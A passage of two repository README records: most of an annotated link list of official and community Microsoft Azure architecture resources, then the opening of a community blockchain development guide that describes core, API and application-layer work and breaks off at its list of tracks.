- [Microsoft Cloud Adoption Framework for Azure](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Digital Defense Report](https://www.microsoft.com/en-us/security/business/microsoft-digital-defense-report?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Investor Relations](https://www.microsoft.com/en-us/investor?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Partner Resources](https://microsoft.github.io/PartnerResources/)
- [Microsoft Product/Licensing Terms](https://www.microsoft.com/licensing/terms/welcome/welcomepage?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Trust Center](https://www.microsoft.com/en-us/trust-center?WT.mc_id=AZ-MVP-5004796)
- [Serverless design examples](https://learn.microsoft.com/en-us/dotnet/architecture/serverless/serverless-design-examples?WT.mc_id=AZ-MVP-5004796)
- [Solutions and Training for Azure Active Directory B2C](https://learn.microsoft.com/en-us/azure/active-directory-b2c/solution-articles?WT.mc_id=AZ-MVP-5004796)
- [Subscription decision guide](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/decision-guides/subscriptions/?WT.mc_id=AZ-MVP-5004796)
- [Ten design principles for Azure applications](https://learn.microsoft.com/en-us/azure/architecture/guide/design-principles/?WT.mc_id=AZ-MVP-5004796)
- [Virtual Microsoft Datacenter Tour](https://news.microsoft.com/stories/microsoft-datacenter-tour/?WT.mc_id=AZ-MVP-5004796)
- [Visual Studio subscriptions](https://azure.microsoft.com/en-us/services/developer-tools/visual-studio-subscriptions/?WT.mc_id=AZ-MVP-5004796)
### Official Videos
Official Microsoft videos.
- [AI Show](https://learn.microsoft.com/en-us/shows/ai-show/?WT.mc_id=AZ-MVP-5004796)
- [Ask The Expert](https://learn.microsoft.com/en-us/shows/ask-the-expert/?WT.mc_id=AZ-MVP-5004796)
- [Azure Enablement Show](https://learn.microsoft.com/en-us/shows/azure-enablement/?WT.mc_id=AZ-MVP-5004796)
- [Azure Friday](https://learn.microsoft.com/en-us/shows/azure-friday/?WT.mc_id=AZ-MVP-5004796)
- [Cloud Training Events](https://www.microsoft.com/en-au/business/learn/cloud-training-events/?WT.mc_id=AZ-MVP-5004796)
- [Code Stories](https://learn.microsoft.com/en-us/shows/CodeStories/?WT.mc_id=AZ-MVP-5004796)
- [Exam Readiness Zone](https://learn.microsoft.com/en-us/shows/exam-readiness-zone/?WT.mc_id=AZ-MVP-5004796)
- [Inside Azure Datacenter Architecture with Mark Russinovich](https://www.youtube.com/watch?v=69PrhWQorEM)
- [Inside Azure for IT](https://learn.microsoft.com/en-us/shows/inside-azure-for-it/?WT.mc_id=AZ-MVP-5004796)
- [Internet of Things Show](https://learn.microsoft.com/en-us/shows/internet-of-things-show/?WT.mc_id=AZ-MVP-5004796)
- [Learn TV](https://learn.microsoft.com/en-us/learn/tv/?WT.mc_id=AZ-MVP-5004796)
- [Preparing for Azure advanced specializations](https://partner.microsoft.com/en-us/training/assets/collection/preparing-for-azure-advanced-specializations#/)
- [Reactor](https://learn.microsoft.com/en-us/shows/reactor/?WT.mc_id=AZ-MVP-5004796)
- [The DevOps Lab](https://learn.microsoft.com/en-us/shows/devops-lab/?WT.mc_id=AZ-MVP-5004796)
### Official Announcements and Articles
Official Microsoft feature and product announcement pages and what's new.
- [Azure Backup Center - Backups and Good Governance](https://techcommunity.microsoft.com/t5/itops-talk-blog/azure-backup-center-backups-and-good-governance/ba-p/2318843?WT.mc_id=AZ-MVP-5004796)
- [On Prem To the Cloud: Everything As Code](https://devblogs.microsoft.com/devops/on-prem-to-the-cloud-everything-as-code-ep-4/?WT.mc_id=AZ-MVP-5004796)
### Official Books
Official Microsoft ebooks and whitepapers.
- [Architecting Modern Web Applications with ASP.NET Core and Microsoft Azure](https://dotnet.microsoft.com/en-us/download/e-book/aspnet/pdf?WT.mc_id=AZ-MVP-500479)
- [Azure for Architects](https://azure.microsoft.com/en-us/resources/azure-for-architects/?WT.mc_id=AZ-MVP-5004796)
- [Azure Resiliency – Business Continuity and Disaster Recovery](https://azure.microsoft.com/en-us/resources/resilience-in-azure-whitepaper/?WT.mc_id=AZ-MVP-5004796)
- [Azure SQL Resource Kit](https://azure.microsoft.com/en-us/resources/azure-sql-resource-kit/?WT.mc_id=AZ-MVP-5004796)
- [Cloud Migration and Modernization with Microsoft Azure e-book](https://azure.microsoft.com/en-us/resources/cloud-migration-and-modernization-with-microsoft-azure-e-book/?WT.mc_id=AZ-MVP-5004796)
- [Cloud Migration Simplified](https://azure.microsoft.com/en-us/resources/cloud-migration-simplified/?WT.mc_id=AZ-MVP-5004796)
- [Cloud Practice Playbooks](https://partner.microsoft.com/en-us/campaigns/cloud-practice-playbooks)
- [Designing Distributed Systems](https://azure.microsoft.com/en-us/resources/designing-distributed-systems/?WT.mc_id=AZ-MVP-5004796)
- [Enterprise Cloud Strategy](https://azure.microsoft.com/en-us/resources/enterprise-cloud-strategy/?WT.mc_id=AZ-MVP-5004796)
- [FinOps with Azure - Bringing FinOps to life through organizational and cultural alignment](https://azure.microsoft.com/en-us/resources/finops-with-azure-bringing-finops-to-life-through-organizational-and-cultural-alignment/?WT.mc_id=AZ-MVP-5004796)
- [Get up and running with Kubernetes](https://azure.microsoft.com/en-us/resources/kubernetes-ebook-collection/?WT.mc_id=AZ-MVP-5004796)
- [How to Choose the Right Azure Services for Your Applications—It's Not A or B E-book Series](https://azure.microsoft.com/en-au/resources/how-to-choose-the-right-azure-services-for-your-applicationsits-not-a-or-e-book-series/?WT.mc_id=AZ-MVP-5004796)
- [Learn Azure in a Month of Lunches](https://azure.microsoft.com/mediahandler/files/resourcefiles/learn-azure-in-a-month-of-lunches/Learn_Azure_in_a_Month_of_Lunches.pdf?WT.mc_id=AZ-MVP-5004796)
- [Migrating Linux to Microsoft Azure](https://azure.microsoft.com/en-us/resources/migrating-linux-to-microsoft-azure/?WT.mc_id=AZ-MVP-5004796)
- [Migration SQL Server databases to Azure](https://download.microsoft.com/download/9/8/C/98C3E3C8-E016-443D-BE22-CFEB187DAFFA/Microsoft_Press_eBook_Migrating_SQL_Server_Databases_to_Azure_8.5x11.pdf?WT.mc_id=AZ-MVP-5004796)
- [Rethinking Enterprise Storage](https://download.microsoft.com/download/8/5/6/85677038-09DE-4F20-AECD-C7A44B5A7E1E/679603ebook.pdf?WT.mc_id=AZ-MVP-5004796)
- [The Developer's Guide to Azure](https://azure.microsoft.com/en-us/resources/whitepapers/developer-guide-to-azure/?WT.mc_id=AZ-MVP-5004796)
### Official Repositories and Tools
Official Microsoft open-source initiatives and repositories.
- [AKS Landing Zone Accelerator](https://github.com/Azure/AKS-Landing-Zone-Accelerator)
- [AKS Release Status](https://releases.aks.azure.com/webpage/index.html#tabasia)
- [ALZ Bicep](https://github.com/Azure/ALZ-Bicep)
- [APIM(Azure API Management)Love](https://aka.ms/apimlove)
- [ARO (Azure Red Hat Openshift) Landing Zone Accelerator](https://github.com/Azure/aro-Landing-Zone-Accelerator)
- [AVDAccelerator](https://github.com/Azure/avdaccelerator)
- [AVDBluePrint](https://github.com/Azure/AVDBlueprint)
- [Alert Toolkit](https://github.com/microsoft/manageability-toolkits)
- [App Service Landing Zone Accelerator](https://github.com/Azure/appservice-landing-zone-accelerator)
- [Azure Accelerators](https://msusazureaccelerators.github.io/)
- [Azure AlwaysOn](https://github.com/Azure/AlwaysOn#readme)
- [Azure Backup Detailed Estimate](https://aka.ms/AzureBackupDetailedEstimates/?WT.mc_id=AZ-MVP-5004796)
- [Azure Certification Poster](http://aka.ms/traincertposter/?WT.mc_id=AZ-MVP-5004796)
- [Azure Certified IoT Device catalog](https://devicecatalog.azure.com/)
- [Azure Certs Poster](https://aka.ms/AzureCerts_poster?WT.mc_id=AZ-MVP-5004796)
- [Azure Connectivity Toolkit (AzureCT)](https://github.com/Azure/NetworkMonitoring/tree/main/AzureCT)
- [Azure Container Apps Workshop](https://aka.ms/aca-workshop)
- [Azure DevOps Marketplace](https://marketplace.visualstudio.com/azuredevops/?WT.mc_id=AZ-MVP-5004796)
- [Azure Hybrid Use Benefit Calculator](https://azure.microsoft.com/en-us/pricing/hybrid-benefit/?WT.mc_id=AZ-MVP-5004796#calculator)
- [Azure Infrastructure Map](https://infrastructuremap.microsoft.com/)
- [Azure Integration Services Landing Zone Accelerator](https://github.com/Azure/Integration-Services-Landing-Zone-Accelerator)
- [Azure Landing Zones for Canadian Public Sector](https://github.com/Azure/CanadaPubSecALZ)
- [Azure NoOps Accelerator](https://github.com/Azure/NoOpsAccelerator)
- [Azure Pricing Calculator](https://azure.microsoft.com/en-us/pricing/calculator/?WT.mc_id=AZ-MVP-5004796)
- [Azure Proactive Resiliency Library (APRL)](https://github.com/Azure/Azure-Proactive-Resiliency-Library-v2)
- [Azure Quickstart Templates](https://github.com/Azure/azure-quickstart-templates)
- [Azure Rapid Assessment Estimator](https://usdco.azurewebsites.net/Resources.aspx)
- [Azure Resource Explorer](https://resources.azure.com/)
- [Azure Review Checklists](https://github.com/Azure/review-checklists)
- [Azure Site Recovery Deployment Planner](https://learn.microsoft.com/en-us/azure/site-recovery/site-recovery-deployment-planner/?WT.mc_id=AZ-MVP-5004796)
- [Azure Stack HCI Sizer](https://azurestackhci-webapplication.azurewebsites.net/#/sizer)
- [Azure Stack HCI Solutions](https://hcicatalog.azurewebsites.net/#/?ProductOptimizedFor=Branch+office+and+edge)
- [Azure Status](https://status.azure.com/en-us/status)
- [Azure Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/?WT.mc_id=AZ-MVP-5004796)
- [Azure Threat Research Matrix](https://microsoft.github.io/Azure-Threat-Research-Matrix/)
- [Azure Twitter](https://twitter.com/Azure)
- [Azure Updates](https://aka.ms/azureroadmap/?WT.mc_id=AZ-MVP-5004796)
- [Bicep subscription vending](https://github.com/Azure/bicep-lz-vending)
- [Business Continuity Guide](https://techcommunity.microsoft.com/t5/fasttrack-for-azure/introducing-the-azure-business-continuity-guide/ba-p/3905424?WT.mc_id=AZ-MVP-5004796)
- [Cloud Adoption Framework - Code samples and templates related to landing zone creation](https://github.com/microsoft/CloudAdoptionFramework/tree/master/ready)
- [Cloud Adoption Framework landing zones for Terraform - Starter template](https://github.com/Azure/caf-terraform-landingzones-starter)
- [Cloud Roles and Operations Management](https://github.com/Azure/cloud-rolesandops)
- [Common Azure Bicep and ARM Modules Library](https://github.com/Azure/ResourceModules)
- [Data Management & Analytics Scenario - Data Landing Zone](https://github.com/Azure/data-landing-zone)
- [DevOps Tooling for Well-Architected Recommendation Process](https://github.com/Azure/WellArchitected-Tools/tree/main/WARP/devops#readme)
- [Enterprise-Scale - Reference Implementation](https://github.com/Azure/Enterprise-Scale)
- [FastTrack for Azure - AKS Operations](https://github.com/Azure/fta-aks-operations)
- [FastTrack for Azure - Architectural Review](https://github.com/Azure/fta-architecturalreview)
- [FastTrack for Azure - As a Service - Azure Design Review](https://ftaaasdev.z6.web.core.windows.net/)
- [FastTrack for Azure - Azure Live - How to deploy Azure services and infrastructure. Leverage Azure Pipeline for CI/CD](https://github.com/Azure/fta-live-iac)
- [FastTrack for Azure - Azure Live Azure Purview](https://github.com/Azure/fta-azurepurview)
- [FastTrack for Azure - Azure Live Sessions](https://github.com/Azure/FTALive-Sessions)
- [FastTrack for Azure - Azure Marketplace](https://github.com/Azure/fta-marketplace-tech)
- [FastTrack for Azure - Cloud Architecture](https://github.com/Azure/fta-cloudarchitecture)
- [FastTrack for Azure - Foundations](https://github.com/Azure/fta-azurefoundations)
- [FastTrack for Azure - FTA Live for Azure Sentinel](https://github.com/Azure/FTA-APACSentinel)
- [FastTrack for Azure - Governance](https://github.com/Azure/fta-governance)
- [FastTrack for Azure - Identity](https://github.com/Azure/fta-identity)
- [FastTrack for Azure - Landing Zone](https://github.com/Azure/fta-landingzone)
- [FastTrack for Azure - Managed Disks](https://github.com/Azure/fta-manageddisks)
- [FastTrack for Azure - Modern Service Management](https://github.com/Azure/fta-ModernServiceManagement)
- [FastTrack for Azure - Monitoring](https://github.com/Azure/fta-monitoring)
- [FastTrack for Azure - Networking](https://github.com/Azure/fta-networking)
- [FastTrack for Azure - Vision AI Session Resources](https://github.com/Azure/fta-ai-learning)
- [FastTrack for Azure - Windows Virtual Desktop](https://github.com/Azure/fta-windowsvirtualdesktop)
- [Hybrid Cloud Deal Size Estimator](https://azurehybridestimator.azurewebsites.net/)
- [Microsoft Azure - Feedback](https://feedback.azure.com/d365community)
- [Microsoft Datacenter Migration Program Kit (DCM Kit)](https://github.com/microsoft/dcmkit)
- [Microsoft Defender for Cloud](https://github.com/Azure/Microsoft-Defender-for-Cloud)
- [Microsoft Exam Simulator](https://aka.ms/examdemo/?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Kusto Detective Agency](https://detective.kusto.io/)
- [Microsoft Sustainability Calculator](https://aka.ms/SustainabilityCalculator)
- [Mission LZ (Landing Zone)](https://github.com/Azure/missionlz)
- [Solution Architecture Questions](https://github.com/Azure/Solution-Architecture-Questions)
- [Static Web Apps CLI](https://azure.github.io/static-web-apps-cli/)
- [Synapse Machine Learning](https://github.com/microsoft/SynapseML)
- [The Migration Guide](https://github.com/Azure/migration)
- [Total Cost of Ownership (TCO) Calculator](https://azure.microsoft.com/en-us/pricing/tco/calculator/?WT.mc_id=AZ-MVP-5004796)
- [Virtual machines selector](https://azure.microsoft.com/en-gb/pricing/vm-selector/?WT.mc_id=AZ-MVP-5004796)
### Official Forums and Feedback
Official Microsoft product feedback sources.
- [Azure Connection Program (ACP)](https://aka.ms/ACPNomination)
- [Azure Governance & Deployments](https://github.com/Azure/azure-policy#general-questions)
- [Microsoft Azure - General Feedback](https://feedback.azure.com/d365community/?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Azure Arc Community Monthly Meetup](https://github.com/microsoft/azure_arc_community)
- [Microsoft Q&A](https://learn.microsoft.com/en-us/answers/index.html?WT.mc_id=AZ-MVP-5004796)
- [Tech Community - Azure](https://techcommunity.microsoft.com/t5/azure/ct-p/Azure?WT.mc_id=AZ-MVP-5004796)
### Official Meetups and Calls
Microsoft delivered community engagement meetings.
- [Adaptive Cloud Community](https://github.com/microsoft/adaptive_cloud_community)
- [Azure Kubernetes Service (AKS) Community](https://github.com/theakscommunity/aks-community-meetings)
- [Azure ARM/Bicep Community Calls](https://github.com/Azure/bicep/issues?q=label%3A%22Community+Call%22+)
- [Azure Development Community Call](https://github.com/Azure/azure-dev/discussions/categories/announcements)
- [Azure DSC Community Call](https://dsccommunity.org/community_calls/)
- [Azure Landing Zone Community Calls](https://aka.ms/ALZ/CommunityCallAgenda)
- [Azure Static WebApps - Community Livestream](https://aka.ms/swa/community/standups)
- [Azure Tech Groups](https://www.meetup.com/pro/azuretechgroups)
- [Cloud Security](https://techcommunity.microsoft.com/t5/security-compliance-and-identity/join-our-security-community/ba-p/927888?WT.mc_id=AZ-MVP-5004796)
- [M365 Platform Community](https://pnp.github.io/#community)
- [Microsoft Reactor](https://developer.microsoft.com/en-us/reactor/?WT.mc_id=AZ-MVP-5004796)
- [PowerShell](https://github.com/PowerShell/PowerShell-RFC/tree/master/CommunityCall)
- [Radius Community Meetings](https://github.com/radius-project/community#community-meetings)
- [Semantic Kernel Community Calls](https://github.com/microsoft/semantic-kernel/blob/main/COMMUNITY.md)
- [Terraform](https://aka.ms/AzureTerraform)
- [Windows Customer Connection](https://techcommunity.microsoft.com/t5/windows-it-pro-blog/join-the-windows-customer-connection-program/ba-p/3473775?WT.mc_id=AZ-MVP-5004796)
### Official Podcasts
Official Microsoft podcasts.
- [Getting Closer to Cloud](https://open.spotify.com/show/64CCVDW3yd7bQKRPJHI7CM?si=23975e78b419434e)
- [Learn Azure in a Month of Lunches](https://audio.microsoft.com/azuremonthoflunches/watch/qzF4iAbmwq8rsQKvVxUscJ)
- [The Azure for Executives Podcast](https://azure.microsoft.com/en-us/industries/podcast/?WT.mc_id=AZ-MVP-5004796)
## Community
> Links below are from community sources, websites, and channels.
### Community Videos
Community videos.
- [Azure explained in plain English videos](https://www.youtube.com/lessthan5min)
- [Microsoft Azure Master Class](https://www.youtube.com/watch?v=rZcyDHIYpO0&list=PLlVtbbG169nGccbp8VSpAozu3w9xSQJoY)
- [Regain Control with Azure Governance](https://www.youtube.com/watch?v=M2y0QsHLeSs)
### Community Podcasts
Community podcasts.
- [Azure All Stars](https://azureallstars.co.nz/)
- [Azure Centric Podcast](https://open.spotify.com/show/0r52YLLXq7fdV1xE5la8gq?autoplay=true)
- [Azure Lunch](https://podcasts.apple.com/us/podcast/azure-lunch/id1436427476)
- [Cloud Solution Architects podcast](https://open.spotify.com/show/3BbVrW8lqA1BJ7McsFYDCL)
- [Ctrl+Alt+Azure](https://ctrlaltazure.com/)
- [Sarah Leans Podcast](https://open.spotify.com/show/34QAAvMLSYN09eOAu3j2b0)
- [The Azure Podcast](https://azpodcast.azurewebsites.net/)
- [The Azure Security Podcast](https://azsecuritypodcast.azurewebsites.net/)
### Community Books
Community books, both physical and ebooks.
- [Azure Architecture Explained](https://www.packtpub.com/product/azure-architecture-explained/9781837634811)
- [Azure Security](https://www.manning.com/books/azure-security-2)
- [Cloud Solution Architect's Career Master Plan: Proven techniques and effective tips to help you become a successful solution architect](https://www.amazon.com/Cloud-Solution-Architects-Career-Master/dp/1805129716)
- [Exam Ref AZ-104 Microsoft Azure Administrator](https://www.bookdepository.com/Exam-Ref-AZ-104-Microsoft-Azure-Administrator-Harshul-Patel/9780136805380?ref=grid-view&qid=1641883617185&sr=1-2)
- [Exam Ref AZ-303 Microsoft Azure Architect Technologies](https://www.bookdepository.com/Exam-Ref-AZ-303-Microsoft-Azure-Architect-Technologies-Timothy-Warner/9780136805090?ref=grid-view&qid=1641883617185&sr=1-5)
- [Exam Ref AZ-304 Microsoft Azure Architect Design](https://www.bookdepository.com/Exam-Ref-AZ-304-Microsoft-Azure-Architect-Design-Ashish-Agrawal/9780137268894?ref=grid-view&qid=1641883617185&sr=1-8)
- [Microsoft 365 Security for IT Pros](https://m365securitybook.com/)
- [Microsoft Azure Architect Technologies and Design](https://www.bookdepository.com/Microsoft-Azure-Architect-Technologies-Design-Complete-Study-Guide-Exams-AZ-303-AZ-304-Benjamin-Perkins/9781119559535?ref=grid-view&qid=1641883617185&sr=1-10)
- [Microsoft Azure Infrastructure Services for Architects: Designing Cloud Solutions](https://www.bookdepository.com/Microsoft-Azure-Infrastructure-Services-for-Architects-John-Savill/9781119596578?ref=grid-view&qid=1641883617185&sr=1-15)
### Community Articles
Community blogs and articles.
- [Architecture in the Cloud](https://luke.geek.nz/azure/architecture-in-the-cloud/)
- [Azure - Considerations for Dev/Test "Sandboxes"](https://github.com/dazzlejim/AzureSandbox)
- [Azure Architecture - Design Principles and Lessons Learned](https://medium.com/azure-architects/azure-architecture-design-principles-and-lessons-learned-e79d700b5f39)
- [Azure Citadel](https://azurecitadel.com/)
- [Azure DevOps and creating your Cloud Adoption Framework](https://luke.geek.nz/azure/azure-devops-and-creating-your-cloud-adoption-framework/)
- [Deploy Azure Naming Tool into an Azure WebApp as a container](https://luke.geek.nz/azure/deploy-azure-naming-tool-into-an-azure-webapp-as-a-container/)
- [How to write a design document for Azure](https://www.cloudelicious.net/how-to-write-a-design-document-for-azure/)
- [Luke Murrays - Azure Blog](https://luke.geek.nz/)
- [Microsoft Azure - Wikipedia](https://en.wikipedia.org/wiki/Microsoft_Azure)
- [Microsoft Azure Naming Conventions](https://luke.geek.nz/azure/microsoft-azure-naming-conventions/)
- [Microsoft Azure Tagging Conventions](https://luke.geek.nz/azure/microsoft-azure-tagging-conventions/)
- [Microsoft Sentinel in Action: Architect, design, implement, and operate Microsoft Sentinel as the core of your security solutions](https://www.amazon.com/Microsoft-Sentinel-Action-Architect-implement/dp/1801815534/ref=sr_1_21?crid=HVH5XJ9I8ACC&keywords=Microsoft+Azure&qid=1641883536&s=books&sprefix=microsoft+azu%2Cstripbooks-intl-ship%2C370&sr=1-21)
- [Study Guide for Azure Architect exam AZ-305: Part 1 – Design a Governance Solution](https://thecloudmarathoner.com/index.php/2022/02/11/study-guide-for-az-305-designing-microsoft-azure-infrastructure-solutions-part-1-design-a-governance-solution/)
- [Study Guide for Azure Architect exam AZ-305: Part 2 – Design Authentication and Authorization Solutions](https://thecloudmarathoner.com/index.php/2022/02/12/study-guide-for-az-305-part-2-design-authentication-and-authorization-solutions/)
### Community Repositories and Tools
Community-created tools and repositories.
- [ASTEROID Project (BETA)](https://azure.github.io/Asteroid/)
- [Azure Architecture](https://github.com/lukemurraynz/Azure-Architecture)
- [Azure Architecture - Solution Requirement Consideration Checklist](https://luke.geek.nz/azure/azure-architecture-solution-requirement-consideration-checklist/)
- [Azure Arc Jumpstart (Arcbox)](https://azurearcjumpstart.io/azure_jumpstart_arcbox/full/)
- [Azure Charts](https://azurecharts.com/)
- [Azure Composite SLA Estimator](https://slaestimator.aztoso.com/)
- [Azure Depreciation Dashboard](https://github.com/azure-deprecation/dashboard/issues/)
- [Azure Design Stencils](https://github.com/David-Summers/Azure-Design)
- [Azure Diagrams](https://azurediagrams.com/)
- [Azure Governance Made Simple](https://book.azgovernance.com/)
- [Azure Governance made simple](https://github.com/ricmmartins/azure-governance-made-simple)
- [Azure IP Ranges](https://azureipranges.azurewebsites.net/)
- [Azure IPAM](https://azure.github.io/ipam/#/)
- [Azure Network Security](https://github.com/Azure/Azure-Network-Security)
- [Azure Optimization Engine](https://github.com/helderpinto/AzureOptimizationEngine)
- [Azure permissions reference](https://azure.permissions.cloud/)
- [Azure Price](https://azureprice.net/)
- [Azure Quick Review](https://github.com/cmendible/azqr/tree/main)
- [Azure Resource Inventory](https://github.com/azureinventory/ARI)
- [Azure Serverless Community Library](https://www.serverlesslibrary.net/)
- [Azure Services Periodic Table](https://azureperiodic.data3.com/)
- [Azure Speed](https://www.azurespeed.com/Azure/Latency)
- [Azure Stack HCI Hands-on-lab guides](https://github.com/DellGEOS/AzureStackHOLs)
- [Azure Tenant Security Solution (AzTS)](https://github.com/azsk/AzTS-docs)
- [Azure TRE](https://microsoft.github.io/AzureTRE/latest/)
- [Azure Virtual Network Capacity Planner](https://vnetplanner.chunliu.me/)
- [Azure Workbench](https://www.azureworkbench.com/)
- [AzureFeeds](https://azurefeeds.com/)
- [AzADServicePrincipalInsights](https://aka.ms/AzADServicePrincipalInsights)
- [AzAdvertizer](https://www.azadvertizer.net/)
- [AzGovViz](https://github.com/JulianHayward/Azure-MG-Sub-Governance-Reporting)
- [AzTools](https://az.nitor.app/)
- [Cloud Custodian](https://cloudcustodian.io/)
- [Cloud Harmony](https://cloudharmony.com/)
- [Cloud Journey](https://github.com/geeksintheweeds/cloud-journey)
- [Cloud Native Architecture Mapbook](https://github.com/PacktPublishing/The-Azure-Cloud-Native-Architecture-Mapbook)
- [Continuous Cloud Optimization Insights](https://github.com/Azure/CCOInsights)
- [Docs Update Tracker](https://docsupdatetracker.net/index.html)
- [dotnet-azure-naming](https://github.com/hlaueriksson/dotnet-azure-naming)
- [Managed Azure Bastion Savings Calculator](http://calc.microcloudservice.com/)
- [Microsoft Azure - Center for Internet Security](https://www.cisecurity.org/benchmark/azure/)
- [Microsoft Azure Security Control Mappings to MITRE ATT&CK](https://github.com/center-for-threat-informed-defense/security-stack-mappings)
- [Microsoft Portals](https://msportals.io/)
- [MSLab](https://github.com/microsoft/MSLab)
- [Must Learn KQL - the series, the book, the merch store](https://github.com/rod-trent/MustLearnKQL)
- [PSRule for Azure](https://github.com/Azure/PSRule.Rules.Azure)
- [Public Cloud Comparison](https://comparecloud.in/)
- [Service Bus Explorer](https://github.com/paolosalvatori/ServiceBusExplorer)
- [Terraform](https://www.terraform.io/)
- [The Azure Kubernetes Service Checklist](https://www.the-aks-checklist.com/)
- [Traffic Flow in Common Azure Networking Patterns](https://github.com/mattfeltonma/azure-networking-patterns)
- [WhatTheHack-collection of hackathons](https://github.com/microsoft/WhatTheHack)
- [[cmd.ms] the Microsoft Cloud command line](https://cmd.ms/)
### Community Newsletter
Community-delivered newsletters.
- [AzureFeeds Newsletter](https://newsletter.azurefeeds.com/join)
- [Entra.News](https://entra.news/)
### Community Forums
Community-delivered and supported forums.
- [Reddit - Azure](https://www.reddit.com/r/AZURE/)
- [Stack Overflow - Azure](https://stackoverflow.com/questions/tagged/azure)
### Community Discord
Community-delivered and supported Discord servers.
- [100 Days of Cloud](https://discord.gg/fwsn67hH)
- [ITOpsTalk's server](https://discord.gg/JXXmcgET)
- [Microsoft Community](https://discord.gg/microsoft)
- [PowerShell](https://discord.gg/powershell)
- [Reddit - Azure](https://discord.gg/cMxFErsEDB)
### Community Slack
Community-delivered and supported Slack workspaces.
- [Ask an Azure Architect](https://askazure.io/)
| AWESOME-Azure-Architecture - https://aka.ms/AwesomeAzureArchitecture | azure,architecture,cloud,microsoft,awesome,awesome-list,security | 0 | 8 | 33 | 333 | 0 | 1 | 2 |
dcbuild3r/blockchain-development-guide | # Disclaimer: this repo is not maintained with up-to-date content. Please visit [devpill.me](https://devpill.me/) to read the newest version of this guide.
# DevPill.me - A Public Good Blockchain Development Guide
![blockchain development guide NFT](./images/blockchain_development_guide.jpg)
## Support this public good
I’m trying to gather resources to fund the development of this public good blockchain development guide and so I got my fren Ana Rueda (@ruedart) to create this amazing graphic for the [Mirror NFT edition](https://dcbuilder.mirror.xyz/PLNPOmKkYaP14kJa5A5pJgyIlg4dWHpjDiHS7BGC7J4). The funds will go to the continued development of this guide (90%) and to Ana for the creation of the art (10%). I’m open to discussion on how to structure the open collaboration around the guide and to allocating the funds into a community-owned multi-sig. The goal is to use the funds gathered on Mirror, Gitcoin grants round 13 and elsewhere to incentivize developers to create sections through bounty submissions. If this idea doesn’t gather appeal, then I will send the funds to the Gitcoin grants matching round so that other public goods get funded. Links to support the development of the blockchain development guide:
- [Mirror NFTs](https://dcbuilder.mirror.xyz/PLNPOmKkYaP14kJa5A5pJgyIlg4dWHpjDiHS7BGC7J4)
- [Gitcoin grants](https://gitcoin.co/grants/4975/devpillme-a-public-good-blockchain-development-gu) (Gitcoin grants round 13 goes from march 9th - 24th, happens recurrently every 3 months)
## Community
If you want to contribute to devpill.me or discuss any of the topics and resources found in the guide, feel free to join our [Discord](https://discord.gg/devpillme) and follow us on [Twitter](https://twitter.com/devpillme) and [Lenster](https://lenster.xyz/u/devpillme.lens).
This repo will not reflect any changes on the [devpill.me website](http://devpill.me/), the repo for the site can be found [here](https://github.com/dcbuild3r/devpill.me) and content with the corresponding markdown files is located in [this directory](https://github.com/dcbuild3r/devpill.me/tree/9f87bc7c77a5ec897c01f7cfbd9eae8842c260ac/content/en/docs). Please submit PRs there instead as it makes it easier for me to process and review.
## Introduction
Nowadays there are countless well-made resources on how to learn blockchain development of all kinds and with different specializations in mind; however, it is still very hard to get guidance and personalized suggestions based on your interests. I am writing this guide to aggregate all the resources I've found over the years, plus give some opinionated commentary on how to approach and use them, so you can maximize learning and practical understanding and get building cool things in the space as soon as possible.
This guide will focus on the Ethereum ecosystem as that's where most developers and applications are. If you are interested in other ecosystems that are non-EVM compatible and are not L2s on Ethereum, then check out their respective documentation or guides written by their developer communities. Examples of other non-EVM compatible blockchains that are popular are Solana (Rust/Anchor), Polkadot (Rust/Substrate), Cosmos, Terra, and others. Most of these blockchains do or will support the EVM stack through various initiatives like Neon EVM (Solana), Moonbeam/Moonriver (Polkadot/Kusama), EVMOS (Cosmos), etc.
I really want this guide to become a community-sourced public good that everyone will be able to take advantage of. I will do my best to present it to the wider blockchain developer community to get constructive feedback, proofreading help, and insight into how to make it the best guide available.
### What is blockchain development?
There are two main categories in my mind, either you build the infrastructure that runs blockchain-based networks or you build applications that run on top of these decentralized and permissionless networks. Of course, this differentiation doesn't encompass all types of development on blockchains, but it is a good way to get started.
#### Core blockchain development
By blockchain infrastructure, people usually mean client implementations of blockchain protocols that nodes or validators run to keep the chains running. These clients are usually focused on distributed ledger technology, networking, virtual machines, and various other low-level types of engineering. The client is what enforces the rules of the blockchain protocol: it runs the consensus mechanism, executes all transactions in the network, makes sure all nodes are in sync, and more. This is also known as core blockchain development, which is not what most devs picture when thinking about blockchain or web3 development in general. There are various niches within blockchain development itself as well; you can focus on improving execution capabilities with technologies like rollups, validiums, or volitions, you can improve decentralization and security guarantees by innovating on the consensus layer of the protocol, etc.
#### Blockchain API
There's also blockchain infrastructure that supports the application layer by providing APIs to access blockchain data, like oracles for smart contracts, indexing services for back ends, libraries that allow you to call and listen to smart contract events, decentralized storage services, and more. There are applications that aggregate data from different smart contracts, transactions, and events on the blockchain to provide useful insight; these apps are mostly centered around data analysis and are not necessarily decentralized, but they require an understanding of the underlying blockchain-based technologies.
#### Blockchain application layer
The most popular type of blockchain development is on top of the application layer. Building decentralized applications (Dapps) can take many different forms, but it usually involves a smart contract and a user interface that interacts with that smart contract and listens to changes in the state of the blockchain. These applications can serve various use cases and can be used to build decentralized financial services, games, and so much more.
If these concepts are completely foreign to you I suggest reading the how to get started section first, or Google the words you may not understand.
### Specializations
There are many different specializations within blockchain development, and each requires a different set of skills; however, a general understanding of distributed systems, basic cryptography, and how smart contracts operate is required as a foundation for all of them. In this guide I'll try to provide a general overview of each of them, as well as give the best guidance I can on the resources learners should prioritize and the order in which they should take them. There are many roles that I'm not as familiar with, so feel free to suggest pull requests with changes or DM me with suggestions.
#### Skill-based
There are different sets of skills required for different specializations, the technology stack and knowledge needed are determined by the layer and application that you want to target as a developer. I believe that everyone should get a solid general foundation and try out different areas and niches before settling on the main stack they want to focus on. Some people choose specializations according to the end goal that they want to accomplish using blockchain-based technologies, others like myself feel like everything is interesting and can't settle on a single one to specialize in when confronted with an analysis paralysis situation.
This guide will cover these main tracks; however, anyone is free to submit a pull request to add more or expand on the existing ones:
- [Frontend development](#front-end-development)
